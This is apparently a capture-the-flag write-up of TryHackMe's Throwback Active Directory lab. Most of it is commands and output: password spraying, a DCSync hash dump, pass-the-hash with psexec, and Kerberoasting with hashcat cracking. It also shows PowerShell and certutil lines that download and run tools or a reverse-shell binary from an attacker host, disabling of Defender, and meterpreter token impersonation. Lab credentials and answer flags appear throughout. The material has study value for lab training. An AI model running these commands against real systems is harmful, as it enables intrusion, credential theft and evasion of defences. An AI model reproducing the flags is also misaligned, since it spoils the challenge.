Spraying the weak-password list against the usernames pulled from the domain_users table (users_db.txt):

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null crackmapexec smb 10.200.179.117 --continue-on-success -u users_db.txt -p weakPasswords.txt | grep \+
SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK.local\JeffersD:Throwback2020 

What user was successfully password sprayed?

JeffersD

What was the password for the user?

Throwback2020

Task 30 - SYNCHRONIZE

BloodHound flags the backup account as having DCSync rights (replication rights on the domain object), and its password turns up in a note in JeffersD's Documents folder on the DC:
kali@kali:~/Documents/THM/Throwback$ proxychains ssh JeffersD@10.200.179.117
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:22  ...  OK
JeffersD@10.200.179.117's password:   Throwback2020
throwback\jeffersd@THROWBACK-DC01 C:\Users\jeffersd>type Documents\backup_notice.txt
As we backup the servers all staff are to use the backup account for replicating the servers
Don't use your domain admin accounts on the backup servers.

The credentials for the backup are:
TBH_Backup2348!

Best Regards,
Hans Mercer
Throwback Hacks Security System Administrator


kali@kali:~/Documents/THM/Throwback$ proxychains secretsdump.py -dc-ip 10.200.179.117 'THROWBACK/backup:TBH_Backup2348!'@10.200.179.117
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:49667  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4bedd990ee9b5b4ecc9ec1416f62401d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9e46b15fc5fb941c6ff32a752a6668d1:::
[...]
THROWBACK.local\MercerH:1206:aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea:::
[...]

The RemoteOperations error is expected: backup is not a local administrator on the DC, so the SAM/LSA registry path is refused, but the DRSUAPI path needs only the replication (DCSync) rights and returns every NT hash in NTDS.dit.

What user has dcsync rights?

backup

What user can we dump credentials for and is an administrator?

Mercerh

Submit flags for THROWBACK-DC01 in Task 4.

kali@kali:~/Documents/THM/Throwback$ proxychains psexec.py -hashes "aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea" "THROWBACK.local/MercerH"@10.200.179.117
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14  
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
                                                                               
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
[*] Requesting shares on 10.200.179.117..... 
[*] Found writable share ADMIN$                                                
[*] Uploading file aqRjwPOM.exe                                                
[*] Opening SVCManager on 10.200.179.117.....
[*] Creating service Mrdy on 10.200.179.117.....  
[*] Starting service Mrdy.....
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
[!] Press help for extra shell commands 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\users

What is the user flag on THROWBACK-DC01?

C:\Users>type C:\Users\gongoh\Desktop\user.txt
TBH{e6119f456f5107d655be3682559f720f}

What is the root flag on THROWBACK-DC01?

C:\Users>type C:\Users\MercerH\Desktop\root.txt    
TBH{1b9b614a505017c6fa34cb188581db65}

What is the account description flag on THROWBACK-DC01?

C:\Users>powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.50.176.45/PowerView.ps1'); Get-NetUser | select samaccountname, description" 
[...]
samaccountname description                                              
-------------- -----------
MercerH        TBH{b89d9a1648b62a7f2ed01038ac47796b}

Task 31 - This forest has trust issues

hashcat -m 1000 -a 0 -r rules/OneRuleToRuleThemAll.rule hashes/mercerh_hash.txt /usr/share/wordlists/rockyou.txt
5edc955e8167199d1b7d0e656da0ceea:pikapikachu7

kali@kali:~/Documents/THM/Throwback$ proxychains scp /tmp/NotAShell.exe Mercerh@10.200.179.117:"C:/Windows/Temp/"
kali@kali:~/Documents/THM/Throwback$ proxychains ssh Mercerh@10.200.179.117 "C:/Windows/Temp/NotAShell.exe"

use multi/manage/autoroute
set session 15
set subnet 10.200.179.0
exploit
use auxiliary/server/socks_proxy
exploit

What domain has a trust relationship with THROWBACK.local?

corporate.local

What is the hostname of the machine that has a forest trust with the domain controller?

CORP-DC01

What is the Administrator account we can use to access the second forest?

mercerh

What is the name of the file in the Administrator's Documents folder?

server_update.txt

Submit flags for CORP-DC01 in Task 4

Run a cmd as Administrator

What is the user flag on CORP-DC01?

C:\Windows\System32>type C:\Users\Mercerh\Desktop\user.txt
TBH{773e16d57284363e68a4db254860aed1}

What is the root flag on CORP-DC01?

C:\Windows\System32>type C:\Users\Administrator\Desktop\user.txt
TBH{d2368a76214103ac670a7984b4dba5a3}

Task 32 - r/badcode would like a word

GitHub repository: Link

What User has a Github Account?

Rikka Foxx

What was the user found in github?

DaviesJ

What password was found in github?

Management2018

What machine can you access with the credentials?

kali@kali:~/Documents/THM/Throwback$ sudo proxychains xfreerdp /u:MercerH /p:'pikapikachu7' /v:10.200.179.118  

# Run a cmd as administrator
C:\Users\MercerH\Documents> powershell.exe -exec bypass -c "Set-MpPreference -DisableRealtimeMonitoring 1"
C:\Users\MercerH\Documents>certutil -urlcache -f http://10.50.176.45/NotAShell.exe NotAShell.exe
C:\Users\MercerH\Documents> .\NotAShell.exe

use multi/manage/autoroute
set session 21
set subnet 10.200.179.0
exploit
use auxiliary/server/socks_proxy
exploit

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null evil-winrm  -u DaviesJ -p Management2018 -i 10.200.179.243
*Evil-WinRM* PS C:\Users\daviesj\Documents> 

CORP-ADT01

What is the flag on GitHub?

https://github.com/RikkaFoxx

TBH{19fa56ead6f82d8c4abc664e2e56f0b1}

What is the flag on Twitter?

https://twitter.com/tbhSecurity/status/1292594165855981568

TBH{ca57861454b195f6a5c951a634e05f9e}

Task 33 - Identity Theft is not a Joke Jim

*Evil-WinRM* PS C:\Users\daviesj\Documents> certutil -urlcache -f http://10.50.176.45/NotAShell.exe NotAShell.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.
*Evil-WinRM* PS C:\Users\daviesj\Documents> .\NotAShell.exe

meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
CORPORATE\DaviesJ
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
Font Driver Host\UMFD-2
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Window Manager\DWM-1
Window Manager\DWM-2

Impersonation Tokens Available
========================================
CORPORATE\DosierK

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

meterpreter > cat C:\\Users\\dosierk\\Documents\\email_update.txt
Hey team! Hope you guys are having a good day!

As all of you probably already know we are transferring to our new email service as we
transition please use the new emails provided to you as well as the default credentials
that can be found within your emails.

Please do not use these emails outside of corporate as they contain sensitive information.

The new email format is based on what department you are in:

ESM-Example@TBHSecurity.com
FIN-Example@TBHSecurity.com
HRE-Example@TBHSecurity.com
ITS-Example@TBHSecurity.com
SEC-Example@TBHSecurity.com

In order to access your email you will need to go to mail.corporate.local as we get our 
servers moved over.

If you do not already have mail.corporate.local set in your hosts file please reach out to
IT to get that fixed.

Please remain patient as we make this transition and please feel free to email me with any
questions you may have regarding the new transition: HRE-KDoiser@TBHSecurity.com

Karen Dosier,
Human Relations Consulatant

What file is on the Administrator's Documents folder?

email_update.txt

Who wrote the email?

Karen Dosier

What is her official title in the company?

Human Relations Consulatant

Submit flags for CORP-ADT01 in Task 4

What is the user flag on CORP-ADT01?

meterpreter > cat C:\\Users\\DaviesJ\\Desktop\\user.txt
TBH{250fd11eadbd01e7ed14196611d7b255}

What is the root flag on CORP-ADT01?

meterpreter > cat C:\\Users\\dosierk\\Desktop\\root.txt
TBH{7defa0d5b36c72a48e5966fd2493e19e}

What is the flag on LinkedIn?

Link -> TBH{2913c22315f3ce3c873a14e4862dd717}

Task 35 - Lost and Found

To reach the internal web servers from a browser, point FoxyProxy at the SOCKS proxy Metasploit opened (127.0.0.1:1080, the same one proxychains is chaining through); command-line tools keep going through proxychains as before.

echo "10.200.179.232 mail.corporate.local www.breachgtfo.local" | sudo tee -a /etc/hosts

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null ffuf -w new_emails.txt -u http://www.breachgtfo.local/search.php?search=FUZZ -fw 1265
test@email.com          [Status: 200, Size: 5046, Words: 1284, Lines: 224]
SEC-jstewart@TBHSecurity.com [Status: 200, Size: 5071, Words: 1284, Lines: 224]

Email: SEC-JStewart@TBHSecurity.com
Password: aqAwM53cW8AgRbfr
Username: JStewart
Data Breach: pwnDB

What is the Users email who has been affected by the Databreach?

SEC-JStewart@TBHSecurity.com

What was the Users password?

aqAwM53cW8AgRbfr

What credentials could be found in the Email?

TBSEC_GUEST:WelcomeTBSEC1!

Submit flags for reconnaissance in Task 4

What is the flag in the source code of Breach || GTFO?

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null curl "http://www.breachgtfo.local/search.php?search=SEC-jstewart@TBHSecurity.com" | grep TBH
<!--TBH{53f3a6cb77f633edd9749926b9a9217b}-->

TBH{53f3a6cb77f633edd9749926b9a9217b}

What is the flag on the Corporate Mail server?

Using the email address and the password at http://mail.corporate.local/mailbox.php we can get the flag.

TBH{19b6ca4281bbef3ee060aaf1c2eb4021}

Task 36 - Kerberoasting II Electric Boogaloo

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null xfreerdp  /u:TBSEC_GUEST /p:'WelcomeTBSEC1!' /v:10.200.179.79


C:\Users\TBSEC_GUEST>powershell -exec bypass "IEX(New-Object Net.WebClient).downloadString('http://10.50.176.45/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat Hashcat"


TicketByteHexStream  :
Hash                 : $krb5tgs$23$*TBService$TBSECURITY.local$TBSEC-DC01/TBService.TBSECURITY.local:48064*$A54264EEFA8C95B5506BF936032C9D59$E7CB41FA7A4638D373EBEE1539C6B434A6BA1A0199A1F56A93E34F53BA8E50BDB43FB56C3967DDDAE5E0B759D2D22158C1D96F5D7610C0D7FECC7E0E92434449459D77FF7792B532093B7F65E4FA14EB43161EF9B140BA83A0A7951A666E6DCAB2408398F454C627016C5470B1198EAF1BB364F267BDE748FFB8389689CE9C3143A1DC274AD2CB1A624A09781BFB8039802FFB37CC4FD36C90D63476D244004C9DF074C6532777EB96037FA26603AA93201B73C9623418BA4DCE3B40384ECFE3EFB976E972E4DCDD4E4979637D56EE91A8844378A6A815B446598975A65DE5C7B1032ECE479A93BFFD595DFEDBA457F06CFCAF5BEB1CA6E9E44F733EB49A3A43CEF1A476B6744400985449259153CE867A345CD2912F3CCB6B163E1D4AEBAA58416404F34D29B0CAA6AF3274E65DAFEF6F01CCAE8D26E91AE34490A6823767D96B2345C83842ACC8049D94F2D9072B98A1ECF0A7CB92636581EEF1D2A22697B61ABAC7418E9902FDD7527C6206BB0B6EF8734CEBC7CE13E649CDD457A8166DB0BC59CE1C09C5F257FA2144E6E0C12898D0DF34DD9B63D4770E9753AB78985C249B3FFDE4DA6F0E8FF83B5813E212D191AD3139573533EF5BA7675CA20EBF396AC83B7DA801A59823C1400FA01F8BC9427F2EA42CE8B700833D673F67B08A51C119155621CC646A4B7F37233FB2D8E33791FF1FB0A7C2EAA8C2C464524DEA1CB648D5168E1E8023AF09A51B78228EA2285FFB9316D3986BC776CCB7798EE00BF5EAA8B04253775FBFCBD4ABA4F4D7FAD66459D735A4D9213DBEC620B0E574864F25CC37B44D9EF3A607ADC37E1ECDABCCEB72D61D1F5A8C98975479AF67D302D2CC860F1C8ABC7A76C371EC806906E06B355754AACADCBFBEBEB856A71BABBC2D18540E1D35400FA21D3BE9CDA234CF03CD6FC2F79415C15ABBA7F42FF76FCC3DBE05F93DF511001496A50EFCFC050E4676760C73CE84A9E4536C38FC38D0FCF0B076BE874B8E0146445899AFD4EBC96CCDCC6645273F62FF5857E97A83FE16D0B3E4C8165D10D3854541A60F4C29315D173B7F4473F06CA153478B50EC0AF91094D57612D5DEDEE23F325B661D392F8D9B92329AF410B3FE928C63B9A0305B7924BDF0CEFD6EB6CA090232A05C82C83EE39BDEAB7BA0AF813FC0A12CA7C05DF124A8F7405327EAC1CC148F92887F5C3F61787CE29EDF4C1EEC87FA0F8EA7FDC0CCEE6BD4DFACE4B46227D867B3510FA7EB36CECBB689EBDE68B2128D0724F7B38404A2F9CACE0F2CD906881AE2D28904AB02DDD457854E8DE1EBBDD6351A02D8F141460CF53D2D82B8BDB31E20E9066432B10D75B44C7769C7F1D22E93B1C01A4FC825835493230A5F6460C05C797B95629E7AD6EED41A1F0B2BA55ACA62071464E1D733A41FCC96B8C713EE306C75151E04252C673E4974D19A2A267295F41A2AF8A9FF9ECADF4DD59D38181E946A12C6E299F133600903BA85F4F6E1822F7CB62B283C615EE78689609423500C1E1FD04A02714A7B87CF8E36209D1804AC815F0C151F8293
SamAccountName       : TBService
DistinguishedName    : CN=TBService,OU=Quarantine,DC=TBSECURITY,DC=local
ServicePrincipalName : TBSEC-DC01/TBService.TBSECURITY.local:48064

kali@kali:~/Documents/THM/Throwback$ hashcat -m 13100 tbservice_ticket.txt /usr/share/wordlists/rockyou.txt 
[...]:securityadmin284650

What User was vulnerable to Kerberoasting?

TBService

What password could be cracked from the Kerberos Ticket?

securityadmin284650

Submit flags for TBSEC-DC01 in Task 4

What is the user flag on TBSEC-DC01?

C:\Users>type C:\Users\daviesj\Desktop\user.txt
TBH{3efabe3366172f3f97d1123f2cc6dfb5}

What is the root flag on TBSEC-DC01?

kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null xfreerdp  /u:TBService /p:'securityadmin284650!' /v:10.200.179.79
C:\Users>type C:\Users\Administrator\Desktop\root.txt
TBH{ec08be8aa9113b47f321b5032a27b220}